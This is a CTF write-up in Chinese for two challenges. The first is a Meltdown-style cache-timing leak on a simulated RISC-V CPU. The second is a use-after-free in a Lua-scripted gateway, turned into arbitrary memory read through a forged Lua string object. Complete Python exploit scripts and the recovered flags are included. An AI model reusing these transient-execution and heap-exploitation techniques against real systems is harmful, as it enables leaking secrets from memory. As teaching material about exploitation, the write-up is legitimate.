acpu
题目给了一个 Verilator 跑出来的 RISC-V CPU 模拟器。run.py 接收 base64 后把我们的机器码写入 /tmp/rom_file.mem,同 时把 flag 写入 /tmp/flag.mem。
程序实际从 PC 0x400 开始执行,flag 映射在 secret 区域 0x80000000。程序结束方式可以利用非法指令触发寄存器 dump。
启动流程
system.mem 里的启动代码会先设置特权相关 CSR,然后 sret 跳到用户代码。异常入口在 0x40,系统代码里还有一段 flag 比较逻 辑,但直接猜 flag 不现实。
调试版 Simulation_debug 可以生成 sim.vcd,里面能看到:
secret_access
public_access
cache_hit
mem_rdata
illegal_load
这说明题目核心不是普通 RISC-V pwn,而是 CPU 微架构侧信道。
漏洞
用户态直接读取 secret 区:
lui t0, 0x80000
lw t1, 0(t0)
不会把 flag 写回寄存器,因为这是非法 secret load。
但从 VCD 可以看到,虽然 illegal_load = 1,mem_rdata 已经取到了 flag word。更关键的是,后续依赖这个 load 结果的指令仍然 能在流水线里瞬时执行。
于是可以构造类似 Meltdown 的泄露:
lw t1, 0(secret)
andi t1, t1, 0xf
slli t1, t1, 6
lw t2, 0(t1)
这里用 secret 的低 4 bit 选择 public cache 的 16 条 cache line 之一。
Cache侧信道
VCD 里能看到 cache 参数:
NUM_LINES = 16
LINE_BYTES = 64
因此一个 nibble 对应一个地址:
candidate * 64
然后依次访问 16 个候选地址,用 cycle 计时:
rdcycle t1
lw t2, 0(candidate_addr)
add x0, t2, x0
rdcycle t3
sub result, t3, t1
本地测试中:
cache hit 约 4 cycles
cache miss 约 7 cycles
取最小 timing 的 candidate,就是泄露出的 nibble。
每个字节分低 4 bit 和高 4 bit 泄露即可。
所以就是对 0x80000000 + offset 做非法 secret load。用 transient value 访问 secret_nibble * 64。测 16 个 public cache line 的访问时间。最小 timing 对应当前 nibble。每字节泄露两次,直到 }。
exp
import argparse
import base64
import re
import socket
import ssl
import struct
import subprocess
import sys
from pathlib import Path
ROOT = Path(__file__).resolve().parent
PROMPT = b"give me your code:"
def lui(rd, imm20):
return ((imm20 & 0xFFFFF) << 12) | (rd << 7) | 0x37
def itype(opcode, rd, funct3, rs1, imm):
return ((imm & 0xFFF) << 20) | (rs1 << 15) | (funct3 << 12) | (rd << 7) | opcode
def rtype(rd, funct3, rs1, rs2, funct7=0):
return (funct7 << 25) | (rs2 << 20) | (rs1 << 15) | (funct3 << 12) | (rd << 7) | 0x33
def addi(rd, rs1, imm):
return itype(0x13, rd, 0, rs1, imm)
def andi(rd, rs1, imm):
return itype(0x13, rd, 7, rs1, imm)
def slli(rd, rs1, shamt):
return itype(0x13, rd, 1, rs1, shamt)
def srli(rd, rs1, shamt):
return itype(0x13, rd, 5, rs1, shamt)
def lw(rd, imm, rs1):
return itype(0x03, rd, 2, rs1, imm)
def add(rd, rs1, rs2):
return rtype(rd, 0, rs1, rs2, 0)
def sub(rd, rs1, rs2):
return rtype(rd, 0, rs1, rs2, 0x20)
def rdcycle(rd):
# This CPU implements cycle read as a custom SYSTEM imm=0xc00, funct3=0.
return (0xC00 << 20) | (rd << 7) | 0x73
def pack(words):
return b"".join(struct.pack("<I", word) for word in words)
def build_probe(byte_index, high_nibble):
word_offset = (byte_index // 4) * 4
shift = (byte_index % 4) * 8 + (4 if high_nibble else 0)
words = [
lui(5, 0x80000), # x5 = secret base
lw(6, word_offset, 5) # illegal load; value is still forwarded transiently
]
if shift:
words.append(srli(6, 6, shift))
words += [
andi(6, 6, 0xF),
slli(6, 6, 6), # nibble selects one 64-byte public cache line
lw(7, 0, 6),
add(0, 7, 0), # force the transient public load to complete
]
for candidate in range(16):
out = 10 + candidate
words += [
addi(5, 0, candidate * 64),
rdcycle(6),
lw(7, 0, 5),
add(0, 7, 0), # serialize rdcycle after load latency
rdcycle(8),
sub(out, 8, 6),
]
words.append(0) # illegal instruction: dump registers and finish
return pack(words)
class LocalSession:
def __init__(self):
for path in (ROOT / "bin" / "Simulation", ROOT / "bin" / "run.py"):
try:
path.chmod(path.stat().st_mode | 0o111)
except FileNotFoundError:
pass
def run(self, code):
data = base64.b64encode(code).decode()
proc = subprocess.run(
[sys.executable, str(ROOT / "bin" / "run.py")],
input=data + "\n\n",
text=True,
capture_output=True,
timeout=20,
cwd=ROOT,
)
return proc.stdout + proc.stderr
def close(self):
pass
class RemoteSession:
def __init__(self, host, port, ssl_enabled=False):
raw_sock = socket.create_connection((host, port))
if ssl_enabled:
context = ssl._create_unverified_context()
self.sock = context.wrap_socket(raw_sock, server_hostname=host)
else:
self.sock = raw_sock
self._recv_until(PROMPT)
def _recv_until(self, marker):
buf = b""
while marker not in buf:
chunk = self.sock.recv(4096)
if not chunk:
raise EOFError("connection closed")
buf += chunk
return buf
def run(self, code):
self.sock.sendall(base64.b64encode(code) + b"\n")
return self._recv_until(PROMPT).decode("latin-1", "replace")
def close(self):
try:
self.sock.sendall(b"\n")
finally:
self.sock.close()
REG_RE = re.compile(r"^x(\d+)\s*=\s*0x([0-9a-fA-F]+)", re.MULTILINE)
def parse_regs(output):
return {int(reg): int(value, 16) for reg, value in REG_RE.findall(output)}
def leak_nibble(session, byte_index, high_nibble, tries):
votes = []
for _ in range(tries):
output = session.run(build_probe(byte_index, high_nibble))
regs = parse_regs(output)
timings = [regs.get(10 + i) for i in range(16)]
if any(value is None for value in timings):
raise RuntimeError(f"missing timing registers in output:\n{output}")
votes.append(min(range(16), key=lambda i: timings[i]))
return max(set(votes), key=votes.count)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("host", nargs="?")
parser.add_argument("port", nargs="?", type=int)
parser.add_argument("--max-len", type=int, default=64)
parser.add_argument("--tries", type=int, default=1)
parser.add_argument("--ssl", action="store_true")
args = parser.parse_args()
if (args.host is None) != (args.port is None):
parser.error("provide both host and port, or neither for local mode")
session = LocalSession() if args.host is None else RemoteSession(args.host, args.port, args.ssl)
flag = bytearray()
try:
for index in range(args.max_len):
low = leak_nibble(session, index, False, args.tries)
high = leak_nibble(session, index, True, args.tries)
value = (high << 4) | low
flag.append(value)
shown = flag.rstrip(b"\x00").decode("latin-1", "replace")
print(f"\r{shown}", end="", flush=True)
if value == 0 or (value == ord("}") and b"{" in flag):
break
finally:
session.close()
print()
if __name__ == "__main__":
main()
ACTF{H4v3_y0u_h34rd_0f_m3ltd0wn?}
badgate
附件给了一个 badgate 服务端、Dockerfile、xinetd 配置和一个 Lua HTTP 示例。程序启动后先从标准输入读取 Lua 脚本,直到遇到单独一行 EOF。脚本必须调用 gateway.run(function(conn, pkt) ... end)。之后程序会随机监听一个 10000-12000 范围内的端口,每个后续 TCP 连接都会生成一个 conn 和 pkt 传入 Lua handler。
二进制是 stripped PIE,Lua 5.5 被静态编进了程序,动态依赖只有 libc/libm。Docker 中通过 xinetd 启动:
chroot --userspec=1001:1001 /home/ctf ./badgate
因此容器内 /home/ctf/flag 在程序视角中就是 /flag 或当前目录下的 flag。Lua 环境做了一定裁剪:
io=nil
os=nil
package=nil
debug=nil
require=nil
loadfile=function
dofile=function
本地附件的占位 flag 是 ACTF{__REDACTED__},它刚好能被 Lua 解释成 ACTF({__REDACTED__})。所以一开始可以通过自定义 ACTF 函数和 _G.__index 读出本地占位 flag。但远端真实 flag 为 ACTF{1u4_...},1u4 会被 Lua 词法分析成非法数字,远端探测结果为:
/flag -> nil / /flag:1: malformed number near '1u'
flag -> nil / flag:1: malformed number near '1u'
./flag -> nil / ./flag:1: malformed number near '1u'
这说明 flag 文件存在且可被 loadfile 打开,只是不能直接当 Lua chunk 执行。
漏洞
漏洞在 pkt:view() 和 conn:close() 的生命周期管理。
pkt:view(off, len) 会创建一个新的 gateway.pkt 对象,但这个对象只是保存原 packet buffer 的指针、偏移和长度,并没有持有底层 buffer 的所有权,也不会增加引用计数。
conn:close() 会关闭连接并释放连接关联的 packet buffer。如果 Lua 代码提前保存了 pkt:view() 返回的对象,那么 conn:close() 之后这个 view 仍然可以调用:
old:tostring()
old:write(off, data)
于是形成 use-after-free。由于 handler 所在的 Lua state 会在同一个 badgate 进程中跨多个数据连接持续存在,我们可以把悬挂的 pkt 保存在 Lua 全局变量里,后续连接继续使用。
核心触发逻辑:
rw = pkt:view(0, pkt:len())
conn:close()
-- rw 现在指向已经释放的 packet buffer
思路
构造任意地址读,把 /flag 的原始内容从内存中读出来。
首次数据连接中保存悬挂 pkt:view,随后 conn:close() 释放 packet buffer。
在同一个 Lua handler 中创建一个较大的 Lua table,使 table 的数组区复用刚释放的 packet buffer。
后续连接中向新的 pkt 发送伪造数据,再用悬挂的 rw:write(0, data) 写入已经复用为 table 数组区的内存。
覆盖 table 中某个元素的 GC 指针,让它指向我们在同一 chunk 中伪造的 Lua TString。
伪造 TString 的长度和数据指针,然后执行 conn:send(t[256]),即可让 Lua 把任意地址处的内存当字符串发送出来。
为了避免依赖固定堆布局,exp 会先做自校验。它枚举几个候选偏移,在伪造 TString 的数据区写入 HELLO_WORLD,只有 conn:send(t[256]) 正确返回 HELLO_WORLD 时才继续。
伪造字符串对象时用到的关键字段:
payload[FAKE_OFF + 8] = 0x14 # TString 类型标记
payload[FAKE_OFF + 11] = 0xff # 长字符串标记
pack64(FAKE_OFF + 16, size) # 字符串长度
pack64(FAKE_OFF + 24, target) # 字符串内容指针
这样可以把 conn:send(t[256]) 变成:
send(target, size)
泄漏地址
Lua 的 tostring(loadfile) 会输出类似:
function: 0x55......
这个地址可以用来恢复 PIE 基址:
pie = loadfile_addr - 0xCEA0
随后读取 fopen64@got 得到 libc 地址:
fopen64 = read64(pie + 0x3EEB0)
题目 Docker 基于 Ubuntu 24.04,但本地和远端 libc 小版本可能不同,所以 exp 同时尝试了两个 fopen64 偏移:
LIBC_FOPEN64_CANDIDATES = (0x85E50, 0x85E60)
LIBC_ENVIRON = 0x20AD58
用页对齐和栈地址范围校验 libc base 后,读取 environ 得到栈附近地址。
读取 flag
远端 flag 文件可被 loadfile("flag") 打开。虽然解析失败,但 Lua/parser 和 libc 文件读取过程会把原始文件内容短暂留在栈或堆上。
exp 在第 5 次及之后的数据连接中触发:
keep = {loadfile("flag")}
然后用任意读从 environ 附近向低地址读一段栈内存,搜索 flag 格式:
ACTF\{[^\x00\r\n}]{1,160}\}
有时由于读到的位置从 CTF{ 开始,脚本也兼容这种情况并补回开头的 A。
Exp
最终脚本见
import re
import socket
import struct
import sys
ASIZE = 256
FAKE_OFF = 0x100
DATA_OFF = 0x140
LOADFILE_OFF = 0xCEA0
FOPEN_GOT = 0x3EEB0
LIBC_FOPEN64_CANDIDATES = (0x85E50, 0x85E60)
LIBC_ENVIRON = 0x20AD58
DELTA_CANDIDATES = (0x25F0, 0x2310, 0x2240, 0x2200)
LUA = f'''
local phase = 0
local t = nil
local rw = nil
local info = ""
local long = string.rep("L", 100)
local keep = nil
gateway.run(function(conn, pkt)
phase = phase + 1
if phase == 1 then
rw = pkt:view(0, pkt:len())
conn:close()
t = {{}}
for i = 1, {ASIZE} do
t[i] = long
end
info = tostring(t) .. "\\n" .. tostring(loadfile) .. "\\n"
elseif phase == 2 then
conn:send(info)
conn:close()
else
local data = pkt:tostring()
if phase >= 5 then
keep = {{loadfile("flag")}}
end
rw:write(0, data)
conn:send(t[{ASIZE}])
conn:close()
end
end)
'''
def recv_until(sock, marker):
data = b""
while marker not in data:
chunk = sock.recv(4096)
if not chunk:
break
data += chunk
return data
def recvall(sock):
data = b""
while True:
chunk = sock.recv(65536)
if not chunk:
return data
data += chunk
def connect(host, port):
return socket.create_connection((host, port), timeout=8)
def start(host, port):
with connect(host, port) as s:
recv_until(s, b"EOF\n")
s.sendall(LUA.encode() + b"EOF\n")
banner = b""
while b"listening on" not in banner:
line = recv_until(s, b"\n")
if not line:
break
banner += line
m = re.search(rb":(\d+)", banner)
if not m:
raise RuntimeError(f"no listener in banner: {banner!r}")
return int(m.group(1))
def data_request(host, port, payload):
with connect(host, port) as s:
s.sendall(payload)
return recvall(s)
def build_payload(fake_addr, target, size):
payload = bytearray(b"P" * 512)
struct.pack_into("<Q", payload, 0, fake_addr)
struct.pack_into("<Q", payload, FAKE_OFF + 0, 0)
payload[FAKE_OFF + 8] = 0x14
payload[FAKE_OFF + 11] = 0xFF
struct.pack_into("<Q", payload, FAKE_OFF + 16, size)
struct.pack_into("<Q", payload, FAKE_OFF + 24, target)
return bytes(payload)
def build_selftest(table_addr, delta):
chunk = table_addr + delta
fake = chunk + FAKE_OFF
data_addr = chunk + DATA_OFF
payload = bytearray(build_payload(fake, data_addr, 11))
payload[DATA_OFF:DATA_OFF + 11] = b"HELLO_WORLD"
return bytes(payload)
def find_flag(blob):
for m in re.finditer(rb"ACTF\{[^\x00\r\n}]{1,160}\}", blob):
return m.group(0).decode("latin1")
for m in re.finditer(rb"CTF\{[^\x00\r\n}]{1,160}\}", blob):
return ("A" + m.group(0).decode("latin1"))
return None
def main():
host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
port = int(sys.argv[2]) if len(sys.argv) > 2 else 9999
data_port = start(host, port)
data_request(host, data_port, b"A" * 4095)
info = data_request(host, data_port, b"B")
table_addr = int(re.search(rb"table: 0x([0-9a-fA-F]+)", info).group(1), 16)
loadfile_addr = int(re.search(rb"function: 0x([0-9a-fA-F]+)", info).group(1), 16)
delta = None
for candidate in DELTA_CANDIDATES:
out = data_request(host, data_port, build_selftest(table_addr, candidate))
if out == b"HELLO_WORLD":
delta = candidate
break
if delta is None:
raise RuntimeError("failed to calibrate UAF heap delta")
fake = table_addr + delta + FAKE_OFF
def readmem(addr, size):
return data_request(host, data_port, build_payload(fake, addr, size))
pie = loadfile_addr - LOADFILE_OFF
fopen64 = struct.unpack("<Q", readmem(pie + FOPEN_GOT, 8))[0]
environ = None
for fopen_off in LIBC_FOPEN64_CANDIDATES:
libc = fopen64 - fopen_off
if libc & 0xFFF:
continue
candidate = struct.unpack("<Q", readmem(libc + LIBC_ENVIRON, 8))[0]
if 0x700000000000 <= candidate <= 0x7FFFFFFFFFFF:
environ = candidate
break
if environ is None:
raise RuntimeError("failed to derive a plausible stack pointer from libc")
# The loadfile("flag") call in the Lua handler starts at phase >= 5.
# Its parser buffer tends to remain on the C stack near environ.
for span in (0x20000, 0x30000):
stack = readmem(environ - span, span)
flag = find_flag(stack)
if flag:
print(flag)
return
raise RuntimeError("flag pattern not found in stack read")
if __name__ == "__main__":
main()
ACTF{1u4_3m83dd1n6_3v3rywh3r3|hj5io23j6}